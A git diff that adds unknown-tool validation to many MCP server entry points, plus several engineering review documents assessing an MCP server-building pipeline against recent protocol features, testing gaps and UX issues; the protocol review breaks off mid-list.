exists (MCP spec requires proper error for unknown tools) + const knownTools = tools.map(t => t.name); + if (!knownTools.includes(name)) { + throw new McpError(ErrorCode.MethodNotFound, `Unknown tool: ${name}`); + } try { const result = await handleTool(client, name, args || {}); diff --git a/mcp-diagrams/mcp-servers/lightspeed/src/index.ts b/mcp-diagrams/mcp-servers/lightspeed/src/index.ts index b37983a..d04650e 100644 --- a/mcp-diagrams/mcp-servers/lightspeed/src/index.ts +++ b/mcp-diagrams/mcp-servers/lightspeed/src/index.ts @@ -4,6 +4,8 @@ import { StdioServerTransport } from "@modelcontextprotocol/sdk/server/stdio.js" import { CallToolRequestSchema, ListToolsRequestSchema, + McpError, + ErrorCode, } from 
"@modelcontextprotocol/sdk/types.js"; // ============================================ @@ -307,6 +309,12 @@ async function main() { server.setRequestHandler(CallToolRequestSchema, async (request) => { const { name, arguments: args } = request.params; + // Validate tool exists (MCP spec requires proper error for unknown tools) + const knownTools = tools.map(t => t.name); + if (!knownTools.includes(name)) { + throw new McpError(ErrorCode.MethodNotFound, `Unknown tool: ${name}`); + } + try { const result = await handleTool(client, name, args || {}); return { diff --git a/mcp-diagrams/mcp-servers/mailchimp/src/index.ts b/mcp-diagrams/mcp-servers/mailchimp/src/index.ts index 3eb46f0..05c63cf 100644 --- a/mcp-diagrams/mcp-servers/mailchimp/src/index.ts +++ b/mcp-diagrams/mcp-servers/mailchimp/src/index.ts @@ -4,6 +4,8 @@ import { StdioServerTransport } from "@modelcontextprotocol/sdk/server/stdio.js" import { CallToolRequestSchema, ListToolsRequestSchema, + McpError, + ErrorCode, } from "@modelcontextprotocol/sdk/types.js"; import { createHash } from "crypto"; @@ -353,6 +355,12 @@ async function main() { server.setRequestHandler(CallToolRequestSchema, async (request) => { const { name, arguments: args } = request.params; + + // Validate tool exists (MCP spec requires proper error for unknown tools) + const knownTools = tools.map(t => t.name); + if (!knownTools.includes(name)) { + throw new McpError(ErrorCode.MethodNotFound, `Unknown tool: ${name}`); + } try { const result = await handleTool(client, name, args || {}); diff --git a/mcp-diagrams/mcp-servers/pipedrive/src/index.ts b/mcp-diagrams/mcp-servers/pipedrive/src/index.ts index 6b2617b..520b6e5 100644 --- a/mcp-diagrams/mcp-servers/pipedrive/src/index.ts +++ b/mcp-diagrams/mcp-servers/pipedrive/src/index.ts @@ -4,6 +4,8 @@ import { StdioServerTransport } from "@modelcontextprotocol/sdk/server/stdio.js" import { CallToolRequestSchema, ListToolsRequestSchema, + McpError, + ErrorCode, } from 
"@modelcontextprotocol/sdk/types.js"; // ============================================ @@ -304,6 +306,12 @@ async function main() { server.setRequestHandler(CallToolRequestSchema, async (request) => { const { name, arguments: args } = request.params; + + // Validate tool exists (MCP spec requires proper error for unknown tools) + const knownTools = tools.map(t => t.name); + if (!knownTools.includes(name)) { + throw new McpError(ErrorCode.MethodNotFound, `Unknown tool: ${name}`); + } try { const result = await handleTool(client, name, args || {}); diff --git a/mcp-diagrams/mcp-servers/rippling/src/index.ts b/mcp-diagrams/mcp-servers/rippling/src/index.ts index 4892765..816f194 100644 --- a/mcp-diagrams/mcp-servers/rippling/src/index.ts +++ b/mcp-diagrams/mcp-servers/rippling/src/index.ts @@ -4,6 +4,8 @@ import { StdioServerTransport } from "@modelcontextprotocol/sdk/server/stdio.js" import { CallToolRequestSchema, ListToolsRequestSchema, + McpError, + ErrorCode, } from "@modelcontextprotocol/sdk/types.js"; // ============================================ @@ -330,6 +332,12 @@ async function main() { server.setRequestHandler(CallToolRequestSchema, async (request) => { const { name, arguments: args } = request.params; + + // Validate tool exists (MCP spec requires proper error for unknown tools) + const knownTools = tools.map(t => t.name); + if (!knownTools.includes(name)) { + throw new McpError(ErrorCode.MethodNotFound, `Unknown tool: ${name}`); + } try { const result = await handleTool(client, name, args || {}); diff --git a/mcp-diagrams/mcp-servers/servicetitan/src/index.ts b/mcp-diagrams/mcp-servers/servicetitan/src/index.ts index 48491ba..1573446 100644 --- a/mcp-diagrams/mcp-servers/servicetitan/src/index.ts +++ b/mcp-diagrams/mcp-servers/servicetitan/src/index.ts @@ -4,6 +4,8 @@ import { StdioServerTransport } from "@modelcontextprotocol/sdk/server/stdio.js" import { CallToolRequestSchema, ListToolsRequestSchema, + McpError, + ErrorCode, } from 
"@modelcontextprotocol/sdk/types.js"; // ============================================ @@ -369,6 +371,12 @@ async function main() { server.setRequestHandler(CallToolRequestSchema, async (request) => { const { name, arguments: args } = request.params; + + // Validate tool exists (MCP spec requires proper error for unknown tools) + const knownTools = tools.map(t => t.name); + if (!knownTools.includes(name)) { + throw new McpError(ErrorCode.MethodNotFound, `Unknown tool: ${name}`); + } try { const result = await handleTool(client, name, args || {}); diff --git a/mcp-diagrams/mcp-servers/squarespace/src/index.ts b/mcp-diagrams/mcp-servers/squarespace/src/index.ts index baa6007..d114013 100644 --- a/mcp-diagrams/mcp-servers/squarespace/src/index.ts +++ b/mcp-diagrams/mcp-servers/squarespace/src/index.ts @@ -4,6 +4,8 @@ import { StdioServerTransport } from "@modelcontextprotocol/sdk/server/stdio.js" import { CallToolRequestSchema, ListToolsRequestSchema, + McpError, + ErrorCode, } from "@modelcontextprotocol/sdk/types.js"; // ============================================ @@ -255,6 +257,12 @@ async function main() { server.setRequestHandler(CallToolRequestSchema, async (request) => { const { name, arguments: args } = request.params; + + // Validate tool exists (MCP spec requires proper error for unknown tools) + const knownTools = tools.map(t => t.name); + if (!knownTools.includes(name)) { + throw new McpError(ErrorCode.MethodNotFound, `Unknown tool: ${name}`); + } try { const result = await handleTool(client, name, args || {}); diff --git a/mcp-diagrams/mcp-servers/toast/src/index.ts b/mcp-diagrams/mcp-servers/toast/src/index.ts index 05b587e..c660091 100644 --- a/mcp-diagrams/mcp-servers/toast/src/index.ts +++ b/mcp-diagrams/mcp-servers/toast/src/index.ts @@ -4,6 +4,8 @@ import { StdioServerTransport } from "@modelcontextprotocol/sdk/server/stdio.js" import { CallToolRequestSchema, ListToolsRequestSchema, + McpError, + ErrorCode, } from 
"@modelcontextprotocol/sdk/types.js"; // ============================================ @@ -388,6 +390,12 @@ async function main() { server.setRequestHandler(CallToolRequestSchema, async (request) => { const { name, arguments: args } = request.params; + // Validate tool exists (MCP spec requires proper error for unknown tools) + const knownTools = tools.map(t => t.name); + if (!knownTools.includes(name)) { + throw new McpError(ErrorCode.MethodNotFound, `Unknown tool: ${name}`); + } + try { const result = await handleTool(client, name, args || {}); return { diff --git a/mcp-diagrams/mcp-servers/touchbistro/src/index.ts b/mcp-diagrams/mcp-servers/touchbistro/src/index.ts index 87154a6..3ddd7bf 100644 --- a/mcp-diagrams/mcp-servers/touchbistro/src/index.ts +++ b/mcp-diagrams/mcp-servers/touchbistro/src/index.ts @@ -4,6 +4,8 @@ import { StdioServerTransport } from "@modelcontextprotocol/sdk/server/stdio.js" import { CallToolRequestSchema, ListToolsRequestSchema, + McpError, + ErrorCode, } from "@modelcontextprotocol/sdk/types.js"; // ============================================ @@ -363,6 +365,12 @@ async function main() { server.setRequestHandler(CallToolRequestSchema, async (request) => { const { name, arguments: args } = request.params; + + // Validate tool exists (MCP spec requires proper error for unknown tools) + const knownTools = tools.map(t => t.name); + if (!knownTools.includes(name)) { + throw new McpError(ErrorCode.MethodNotFound, `Unknown tool: ${name}`); + } try { const result = await handleTool(client, name, args || {}); diff --git a/mcp-diagrams/mcp-servers/trello/src/index.ts b/mcp-diagrams/mcp-servers/trello/src/index.ts index d471b6d..27f59b5 100644 --- a/mcp-diagrams/mcp-servers/trello/src/index.ts +++ b/mcp-diagrams/mcp-servers/trello/src/index.ts @@ -4,6 +4,8 @@ import { StdioServerTransport } from "@modelcontextprotocol/sdk/server/stdio.js" import { CallToolRequestSchema, ListToolsRequestSchema, + McpError, + ErrorCode, } from 
"@modelcontextprotocol/sdk/types.js"; // ============================================ @@ -401,6 +403,12 @@ async function main() { server.setRequestHandler(CallToolRequestSchema, async (request) => { const { name, arguments: args } = request.params; + + // Validate tool exists (MCP spec requires proper error for unknown tools) + const knownTools = tools.map(t => t.name); + if (!knownTools.includes(name)) { + throw new McpError(ErrorCode.MethodNotFound, `Unknown tool: ${name}`); + } try { const result = await handleTool(client, name, args || {}); diff --git a/mcp-diagrams/mcp-servers/wave/src/index.ts b/mcp-diagrams/mcp-servers/wave/src/index.ts index 2291d98..f6fd7d1 100644 --- a/mcp-diagrams/mcp-servers/wave/src/index.ts +++ b/mcp-diagrams/mcp-servers/wave/src/index.ts @@ -4,6 +4,8 @@ import { StdioServerTransport } from "@modelcontextprotocol/sdk/server/stdio.js" import { CallToolRequestSchema, ListToolsRequestSchema, + McpError, + ErrorCode, } from "@modelcontextprotocol/sdk/types.js"; // ============================================ @@ -521,6 +523,12 @@ async function main() { server.setRequestHandler(CallToolRequestSchema, async (request) => { const { name, arguments: args } = request.params; + + // Validate tool exists (MCP spec requires proper error for unknown tools) + const knownTools = tools.map(t => t.name); + if (!knownTools.includes(name)) { + throw new McpError(ErrorCode.MethodNotFound, `Unknown tool: ${name}`); + } try { const result = await handleTool(client, name, args || {}); diff --git a/mcp-diagrams/mcp-servers/wrike/src/index.ts b/mcp-diagrams/mcp-servers/wrike/src/index.ts index 6f86b52..e31678c 100644 --- a/mcp-diagrams/mcp-servers/wrike/src/index.ts +++ b/mcp-diagrams/mcp-servers/wrike/src/index.ts @@ -4,6 +4,8 @@ import { StdioServerTransport } from "@modelcontextprotocol/sdk/server/stdio.js" import { CallToolRequestSchema, ListToolsRequestSchema, + McpError, + ErrorCode, } from "@modelcontextprotocol/sdk/types.js"; // 
============================================ @@ -346,6 +348,12 @@ async function main() { // Handle tool calls server.setRequestHandler(CallToolRequestSchema, async (request) => { const { name, arguments: args } = request.params; + + // Validate tool exists (MCP spec requires proper error for unknown tools) + const knownTools = tools.map(t => t.name); + if (!knownTools.includes(name)) { + throw new McpError(ErrorCode.MethodNotFound, `Unknown tool: ${name}`); + } try { const result = await handleTool(client, name, args || {}); diff --git a/mcp-diagrams/mcp-servers/zendesk/src/index.ts b/mcp-diagrams/mcp-servers/zendesk/src/index.ts index 84b94cb..e05c944 100644 --- a/mcp-diagrams/mcp-servers/zendesk/src/index.ts +++ b/mcp-diagrams/mcp-servers/zendesk/src/index.ts @@ -4,6 +4,8 @@ import { StdioServerTransport } from "@modelcontextprotocol/sdk/server/stdio.js" import { CallToolRequestSchema, ListToolsRequestSchema, + McpError, + ErrorCode, } from "@modelcontextprotocol/sdk/types.js"; // ============================================ @@ -331,6 +333,12 @@ async function main() { server.setRequestHandler(CallToolRequestSchema, async (request) => { const { name, arguments: args } = request.params; + + // Validate tool exists (MCP spec requires proper error for unknown tools) + const knownTools = tools.map(t => t.name); + if (!knownTools.includes(name)) { + throw new McpError(ErrorCode.MethodNotFound, `Unknown tool: ${name}`); + } try { const result = await handleTool(client, name, args || {}); diff --git a/mcp-factory-reviews/BOSS-SYNTHESIS.md b/mcp-factory-reviews/BOSS-SYNTHESIS.md new file mode 100644 index 0000000..77127ea --- /dev/null +++ b/mcp-factory-reviews/BOSS-SYNTHESIS.md @@ -0,0 +1,33 @@ +# Boss-Level Final Review Synthesis + +## Universal Agreement (All 3 Bosses) +1. **LLM re-serialization is the #1 fragility** — APP_DATA depends on LLM generating valid JSON. 5-10% parse failure rate. +2. 
**Tool routing testing is theater** — fixture files exist but never run through an actual LLM +3. **MCP Apps protocol is live** (Jan 26 2026) — our pattern is now legacy +4. **SDK must be ^1.26.0** — security fix GHSA-345p-7cg4-v4c7 released today +5. **escapeHtml is DOM-based and slow** — needs regex replacement + +## Critical Code Bugs (Mei) +- Circuit breaker race condition in half-open state +- Retry lacking jitter (thundering herd) +- HTTP session memory leak (no TTL) +- OAuth token refresh thundering herd (no mutex) + +## Cross-Skill Contradictions (Alexei) +- Phase numbering: 5 vs 7 mismatch +- Content annotations planned in analyzer, never built in builder +- Capabilities declare resources/prompts but none implemented +- Data shape contract gap between tools and apps +- 18 total cross-skill issues mapped + +## UX/AI Gaps (Kofi) +- No "updating" state between data refreshes +- sendToHost documented but not wired on host side +- Multi-intent and correction handling missing +- No production quality monitoring +- 7 quality drop points in user journey mapped + +## Overall Ratings +- Alexei: 8.5/10 +- Mei: "NOT READY FOR PRODUCTION AT A BANK" but 2-3 weeks from it +- Kofi: Infrastructure is production-grade, AI interaction layer is the gap diff --git a/mcp-factory-reviews/SYNTHESIS.md b/mcp-factory-reviews/SYNTHESIS.md new file mode 100644 index 0000000..1311261 --- /dev/null +++ b/mcp-factory-reviews/SYNTHESIS.md @@ -0,0 +1,158 @@ +# MCP Factory Review — Synthesis & Debate Summary + +**Date:** February 4, 2026 +**Reviewers:** Alpha (Protocol), Beta (Production), Gamma (AI/UX) +**Total findings:** ~48 unique recommendations across 3 reviews + +--- + +## Where All Three Agree (The No-Brainers) + +### 1. Testing/QA Is the Weakest Skill +- **Alpha:** No MCP protocol compliance testing at all +- **Beta:** "Everything is manual. 30 servers × 10 apps = 300 things to manually verify. This doesn't scale." 
+- **Gamma:** "It's a manual checklist masquerading as a testing framework." No quantitative metrics, no regression baselines, no automated tests. + +**Verdict:** QA needs a complete overhaul — automated test framework, quantitative metrics, fixture data, regression baselines. + +### 2. MCP Spec Has Moved Past Our Skills +- **Alpha:** Missing structuredContent/outputSchema, Elicitation, Tasks — 3 major spec features since June 2025 +- **Beta:** APP_DATA format is fragile (LLMs produce bad JSON), should use proper structured output +- **Gamma:** Official MCP Apps extension (Jan 2026) with `ui://` URIs makes our iframe/postMessage pattern semi-obsolete + +**Verdict:** Our skills are built against ~March 2025 spec. Need to update for the November 2025 spec + January 2026 MCP Apps extension. + +### 3. Tool Descriptions Are Insufficient +- **Alpha:** Missing `title` field, no outputSchema declarations +- **Beta:** Descriptions are too verbose for token budgets +- **Gamma:** Need "do NOT use when" disambiguation — reduces misrouting ~30% + +**Verdict:** Tool descriptions are the #1 lever for quality. Add negative disambiguation, add title field, optimize for token budget. + +### 4. Apps Are Display-Only +- **Beta:** No interactive patterns noted as a gap +- **Gamma:** "No drag-and-drop, no inline editing, no search-within-app. Apps feel like screenshots, not tools." + +**Verdict:** Need at minimum: client-side sort, filter, copy-to-clipboard, expand/collapse. 
+ +--- + +## Unique High-Impact Insights Per Agent + +### Alpha's Gems (Protocol): +- **SDK v1.26.0 is current** — we should pin `^1.25.0` minimum, not `^1.0.0` +- **Streamable HTTP** is the recommended production transport — we only cover stdio +- **structuredContent + outputSchema** is THE proper way to send typed data to apps +- **SDK v2 split** coming Q1 2026 — need migration plan + +### Beta's Gems (Production): +- **Token budget is the real bottleneck**, not memory — 50+ tools = 10K+ tokens just in definitions +- **Circuit breaker pattern is missing** — retry without circuit breaker amplifies failures +- **No request timeouts** — a hanging API blocks the tool indefinitely +- **MCP Gateway pattern** — industry standard for managing multiple servers at scale +- **OpenAPI-to-MCP automation** — tools exist to auto-generate servers from specs (10x speedup potential) +- **Pipeline resumability** — if an agent crashes mid-phase, there's no checkpoint to resume from + +### Gamma's Gems (AI/UX): +- **"Do NOT use when" in tool descriptions** — single highest-impact improvement per Paragon research +- **WCAG contrast failure** — #96989d secondary text fails AA at 3.7:1 (needs 4.5:1, fix: #b0b2b8) +- **Quantitative QA metrics** — Tool Correctness Rate, Task Completion Rate, not just pass/fail checklists +- **Test data fixtures** — standardized sample data per app type, including edge cases and adversarial data +- **System prompts need structured tool routing rules**, not just "describe capabilities" +- **BackstopJS for visual regression** — pixel-diff screenshot comparison + +--- + +## The Debate: Where They Diverge + +### Lazy Loading: Valuable or Misguided? 
+- **Alpha:** Lazy loading is good, optimize further with selective tool registration +- **Beta:** "Lazy loading optimizes the wrong thing — token budget is the bottleneck" +- **Gamma:** "Cap active tools at 15-20 per interaction" + +**Resolution:** Lazy loading helps with startup time but doesn't solve the token problem. Need BOTH: lazy loading for code + dynamic tool filtering for context. Only surface tools relevant to the current conversation. + +### APP_DATA Pattern: Fix or Replace? +- **Alpha:** It's proprietary and conflated with MCP protocol. Should use structuredContent. +- **Beta:** It's fragile — LLMs produce bad JSON in HTML comments. Need robust parsing. +- **Gamma:** Official MCP Apps extension supersedes it. + +**Resolution:** Short-term: make the parser more robust (Beta's point). Medium-term: adopt structuredContent as the data transport (Alpha's point). Long-term: support official MCP Apps protocol alongside our custom one (Gamma's point). + +### How Much Testing Is Enough? +- **Alpha:** Add protocol compliance testing (MCP Inspector) +- **Beta:** Need Jest + Playwright automation. Manual doesn't scale. +- **Gamma:** Need quantitative metrics (>95% tool correctness rate) + regression baselines + +**Resolution:** All three are right at different layers. Build a 4-tier automated test stack: MCP Inspector (protocol) → Jest (unit) → Playwright (visual) → Fixture-based routing tests (functional). 
+ +--- + +## Consolidated Priority Actions + +### TIER 1 — Before Shipping Next Server (1-2 days) + +| # | Action | Source | Effort | +|---|--------|--------|--------| +| 1 | Fix WCAG contrast: #96989d → #b0b2b8 in all app templates | Gamma | 30 min | +| 2 | Add request timeouts (AbortController, 30s default) to server template | Beta | 30 min | +| 3 | Add "do NOT use when" disambiguation to tool description formula | Gamma | 2 hrs | +| 4 | Pin SDK to `^1.25.0`, Zod to `^3.25.0` | Alpha | 15 min | +| 5 | Add `title` field to all tool definitions | Alpha | 1 hr | +| 6 | Add circuit breaker to API client template | Beta | 2 hrs | +| 7 | Add structured logging to server template | Beta | 1 hr | +| 8 | Add error boundaries to all app templates | Gamma | 1 hr | + +### TIER 2 — Before the 30-Server Push (1 week) + +| # | Action | Source | Effort | +|---|--------|--------|--------| +| 9 | Add structuredContent + outputSchema to server builder | Alpha | 4 hrs | +| 10 | Build automated QA framework (Jest + Playwright) | Beta+Gamma | 2 days | +| 11 | Create test data fixtures library (per app type) | Gamma | 4 hrs | +| 12 | Add quantitative QA metrics (tool correctness, task completion) | Gamma | 4 hrs | +| 13 | Add integration validation script (cross-reference all 4 files) | Beta | 3 hrs | +| 14 | Add interactive patterns to apps (sort, filter, copy, expand/collapse) | Gamma | 1 day | +| 15 | Improve system prompt engineering (routing rules, few-shot examples, negatives) | Gamma | 4 hrs | +| 16 | Add Streamable HTTP transport option | Alpha | 4 hrs | + +### TIER 3 — During/After 30-Server Push (2-4 weeks) + +| # | Action | Source | Effort | +|---|--------|--------|--------| +| 17 | Support official MCP Apps extension (`_meta.ui.resourceUri`) | Alpha+Gamma | 1 week | +| 18 | Implement dynamic tool filtering (context-aware registration) | Beta+Gamma | 3 days | +| 19 | Add Elicitation support | Alpha | 2 days | +| 20 | Explore OpenAPI-to-MCP automation for existing servers | 
Beta | 3 days | +| 21 | Add visual regression baselines (BackstopJS) | Gamma | 2 days | +| 22 | Add data visualization primitives (line charts, sparklines, donuts) | Gamma | 3 days | +| 23 | Implement MCP gateway layer for LocalBosses | Beta | 1-2 weeks | +| 24 | Pipeline resumability (checkpoints, idempotent phases) | Beta | 1 day | +| 25 | Add accessibility testing (axe-core, keyboard nav) | Gamma | 2 days | + +### TIER 4 — Future / Nice-to-Have + +| # | Action | Source | +|---|--------|--------| +| 26 | SDK v2 migration plan | Alpha | +| 27 | Non-REST API support (GraphQL, SOAP) | Beta | +| 28 | Bidirectional app communication (sendToHost) | Gamma | +| 29 | Tasks (async operations) support | Alpha | +| 30 | Centralized secret management | Beta | +| 31 | App micro-interactions (staggered animations) | Gamma | +| 32 | Multi-tenant considerations | Beta | + +--- + +## Key Numbers + +- **3 major MCP spec features missing** (structuredContent, Elicitation, Tasks) +- **30% misrouting reduction** possible with "do NOT use when" disambiguation +- **10K+ tokens** consumed by 50+ tool definitions (the real bottleneck) +- **3.7:1 contrast ratio** on secondary text (needs 4.5:1 for WCAG AA) +- **300+ manual test cases** needed for 30 servers (need automation) +- **SDK v1.26.0** is current (we reference v1.x vaguely) + +--- + +*All three reviews are saved in `mcp-factory-reviews/` for reference.* diff --git a/mcp-factory-reviews/alpha-protocol-review.md b/mcp-factory-reviews/alpha-protocol-review.md new file mode 100644 index 0000000..d43c4fc --- /dev/null +++ b/mcp-factory-reviews/alpha-protocol-review.md @@ -0,0 +1,470 @@ +# Agent Alpha — MCP Protocol & Standards Review + +**Date:** 2026-02-04 +**Reviewer:** Agent Alpha (MCP Protocol & Standards Expert) +**Scope:** MCP-FACTORY.md + 5 skills (mcp-api-analyzer, mcp-server-builder, mcp-app-designer, mcp-localbosses-integrator, mcp-qa-tester) +**Spec Versions Reviewed Against:** MCP 2025-06-18, MCP 2025-11-25 (current), TS SDK 
v1.26.0 (current stable), TS SDK v2 (pre-alpha) + +--- + +## Executive Summary + +1. **The skills are built against an outdated SDK surface area.** The current `@modelcontextprotocol/sdk` is at **v1.26.0** (not "v1.x+" as vaguely stated), and the v2 SDK (pre-alpha, targeting Q1 2026) splits into `@modelcontextprotocol/server` + `@modelcontextprotocol/client`. The skills reference `"^1.0.0"` in package.json — this will work but isn't pinned strategically. + +2. **Three major MCP features from the 2025-06-18 and 2025-11-25 specs are completely missing:** `outputSchema` / `structuredContent` (structured tool outputs), **Elicitation** (server-requested user input), and **Tasks** (async long-running operations). These are significant omissions for a Feb 2026 pipeline. + +3. **Transport coverage is stdio-only.** The spec now defines **Streamable HTTP** as the recommended remote transport, and legacy SSE is deprecated. Our server template only shows `StdioServerTransport` — this is fine for Claude Desktop but severely limits deployment patterns. + +4. **Tool metadata is incomplete.** The 2025-11-25 spec added `title` and `icons` to the Tool definition, on top of the `outputSchema` introduced in 2025-06-18. Our skills only cover `annotations` (readOnlyHint etc.) — we're missing the new first-class fields. + +5. **The "MCP Apps" pattern is entirely custom (LocalBosses-specific).** This is NOT the same as MCP `structuredContent`. The skills conflate our proprietary `APP_DATA` block system with MCP protocol features. This should be clearly documented as a LocalBosses extension, not MCP standard. + +--- + +## Per-Skill Reviews + +### 1. MCP API Analyzer (`mcp-api-analyzer`) + +**Overall Grade: B+** — Solid analysis framework, but missing modern spec awareness. + +#### Issues: + +**CRITICAL — Missing `outputSchema` planning:** +The tool inventory section defines `inputSchema` annotations but never plans for `outputSchema`. Since MCP 2025-06-18, tools can declare output schemas for structured content. 
The analysis template should include a "Response Schema" field per tool that captures the expected output structure. This feeds directly into `structuredContent` at build time. + +**Action:** Add to Section 6 (Tool Inventory) template: +```markdown +- **Output Schema:** `{ data: Contact[], meta: { total, page, pageSize } }` +``` + +**MODERATE — Missing Elicitation candidate identification:** +The MCP 2025-06-18 spec introduced elicitation — servers can request user input mid-flow. The analyzer should identify endpoints/flows that would benefit from interactive elicitation (e.g., "Which account do you want to connect?" during auth, "Confirm before deleting?" for destructive ops). This is a new category of analysis. + +**Action:** Add Section 7b: "Elicitation Candidates" — flows where the server should request user input. + +**MODERATE — Tool naming convention mismatch:** +The skill mandates `snake_case` (`list_contacts`), which is fine and valid per spec. But the 2025-11-25 spec now formally documents tool naming guidance that also allows `camelCase` and `dot.notation` (e.g., `admin.tools.list`). The dot notation is useful for namespacing tool groups. Consider documenting dot notation as an alternative for large APIs. + +**MINOR — Missing `title` field planning:** +The 2025-11-25 spec added an optional `title` field to tools (human-readable display name, separate from the machine-oriented `name`). The analyzer should capture a human-friendly title for each tool. + +**MINOR — Content annotations not planned:** +MCP content (text, images) can now carry `audience` (["user", "assistant"]) and `priority` (0.0-1.0) annotations. These should be planned during analysis — some tool outputs are user-facing (show in UI) vs assistant-facing (feed back to LLM). + +#### What's Good: +- Excellent annotation decision tree (GET→readOnly, DELETE→destructive, etc.) +- Strong app candidate selection criteria +- Good tool description formula ("What it does. What it returns. 
When to use it.") +- Practical pagination pattern documentation + +--- + +### 2. MCP Server Builder (`mcp-server-builder`) + +**Overall Grade: B-** — Functional but architecturally dated. Multiple spec gaps. + +#### Issues: + +**CRITICAL — Missing `outputSchema` and `structuredContent` in tool definitions:** +Since MCP 2025-06-18, tools SHOULD declare an `outputSchema` and return results via `structuredContent` alongside the `content` text fallback. Our template only returns: +```typescript +return { content: [{ type: "text", text: JSON.stringify(result, null, 2) }] }; +``` + +It should return: +```typescript +return { + content: [{ type: "text", text: JSON.stringify(result, null, 2) }], + structuredContent: result, // The actual typed object +}; +``` + +And the tool definition should include: +```typescript +{ + name: "list_contacts", + title: "List Contacts", // NEW in 2025-11-25 + description: "...", + inputSchema: { ... }, + outputSchema: { // NEW in 2025-06-18 + type: "object", + properties: { + data: { type: "array", items: { ... } }, + meta: { type: "object", ... } + } + }, + annotations: { ... } +} +``` + +This is a **fundamental** protocol compliance issue. Without `structuredContent`, clients that expect typed responses will fall back to parsing text — fragile and error-prone. + +**CRITICAL — Transport is stdio-only:** +The server template only shows `StdioServerTransport`. The MCP 2025-11-25 spec defines two standard transports: +1. **stdio** — for local subprocess spawning (Claude Desktop, Cursor) +2. **Streamable HTTP** — for remote/production servers (recommended for scalability) + +Legacy SSE is deprecated. 
The builder skill should provide BOTH transport patterns: +```typescript +// stdio (default for local use) +import { StdioServerTransport } from "@modelcontextprotocol/sdk/server/stdio.js"; + +// Streamable HTTP (for remote deployment) +import { StreamableHTTPServerTransport } from "@modelcontextprotocol/sdk/server/streamableHttp.js"; +``` + +At minimum, the README should document how to add Streamable HTTP for production deployment. + +**CRITICAL — Missing `title` field on tools:** +The 2025-11-25 spec added `title` as a first-class tool property for human-readable display. Our skills never set it. Every tool should have: +```typescript +{ + name: "list_contacts", + title: "List Contacts", // Human-readable, shown in UIs + ... +} +``` + +**MODERATE — Error handling doesn't distinguish Protocol Errors vs Tool Execution Errors:** +The MCP spec now (clarified in 2025-11-25) formally distinguishes: +- **Protocol Errors**: JSON-RPC error codes (-32600, -32601, -32602, -32603) for structural issues +- **Tool Execution Errors**: `isError: true` in the result for business/API failures + +The spec explicitly states that **input validation errors should be Tool Execution Errors** (not Protocol Errors) to enable LLM self-correction. Our Zod validation errors are correctly returned as Tool Execution Errors (good), but we don't document this distinction or handle it intentionally. + +**MODERATE — Missing resource_link in tool results:** +Tools can now return `resource_link` content items, pointing to MCP Resources for additional context. For API tools that return entities, returning a resource link allows the client to subscribe to updates: +```typescript +{ + type: "resource_link", + uri: `service://contacts/${contact.id}`, + name: contact.name, + mimeType: "application/json" +} +``` + +**MODERATE — SDK version pinning is vague:** +`"@modelcontextprotocol/sdk": "^1.0.0"` could resolve to v1.0.0 (ancient) or v1.26.0 (current). 
Should be `"^1.25.0"` minimum to get 2025-11-25 spec support including tasks, icons, and elicitation fixes. + +**MODERATE — No mention of Zod v4 compatibility:** +The SDK v1.x now imports from `zod/v4` internally but maintains backwards compatibility with Zod v3.25+. Our template uses `zod ^3.22.4` — this should be updated to `^3.25.0` minimum or note the Zod v4 migration path. + +**MODERATE — No capabilities declaration for features:** +The server initialization only declares `{ capabilities: { tools: {} } }`. If we plan to use resources, prompts, or logging, these capabilities MUST be declared at init: +```typescript +const server = new Server( + { name: `${MCP_NAME}-mcp`, version: MCP_VERSION }, + { + capabilities: { + tools: { listChanged: false }, + resources: {}, // if serving resources + prompts: {}, // if serving prompts + logging: {}, // for structured logging + } + } +); +``` + +**MINOR — Missing `icons` on tools:** +The 2025-11-25 spec allows tools to declare icons for UI display. Low priority but nice for rich clients. + +**MINOR — Missing JSON Schema 2020-12 awareness:** +The 2025-11-25 spec establishes JSON Schema 2020-12 as the default dialect. Our Zod-to-JSON-Schema conversion should be validated against this. + +#### What's Good: +- Clean modular architecture with lazy loading +- Solid API client pattern with retry/rate-limit logic +- Good Zod validation patterns +- Quality gate checklist is comprehensive + +--- + +### 3. MCP App Designer (`mcp-app-designer`) + +**Overall Grade: B** — Well-crafted UI system, but conceptually disconnected from MCP protocol. + +#### Issues: + +**CRITICAL — Conflation of LocalBosses apps with MCP protocol:** +The entire app system (postMessage, polling, APP_DATA blocks) is a **proprietary LocalBosses pattern**, NOT an MCP protocol feature. 
The skill should be explicit about this: +- MCP's `structuredContent` is the protocol-level structured output +- LocalBosses' APP_DATA rendering is a client-side UI layer that CONSUMES MCP structured content +- These are different layers and should not be confused + +The skill should document how `structuredContent` from MCP tools feeds into the app rendering pipeline. + +**MODERATE — No integration with MCP `structuredContent`:** +The app template receives data via `postMessage` with type `mcp_app_data`. But the actual data source should be MCP tool results with `structuredContent`. The architecture section should show how LocalBosses parses `structuredContent` from tool results and routes it to the appropriate app via postMessage. + +**MODERATE — Missing Resource subscription pattern:** +MCP Resources support subscriptions (clients can subscribe to resource changes and get notifications). Apps could subscribe to resources for real-time updates instead of polling. This is a more MCP-native pattern than the 3-second polling interval. + +**MINOR — App template doesn't handle `resource_link` content:** +If MCP tools return `resource_link` items, the app system should be able to follow those links to fetch additional data. + +#### What's Good: +- Excellent dark theme design system with clear tokens +- 8 app type templates are comprehensive and well-designed +- Three-state rendering (loading/empty/data) is solid +- Responsive design requirements are practical +- Self-contained HTML pattern is pragmatic + +--- + +### 4. MCP LocalBosses Integrator (`mcp-localbosses-integrator`) + +**Overall Grade: B** — Solid integration guide, but the system prompt approach bypasses MCP's native features. + +#### Issues: + +**CRITICAL — APP_DATA block format bypasses MCP protocol:** +The `<!--APP_DATA:{...}:END_APP_DATA-->` pattern works, but it's embedding structured data in LLM-generated text, which is fragile. The proper MCP approach would be: +1. LLM calls an MCP tool +2.
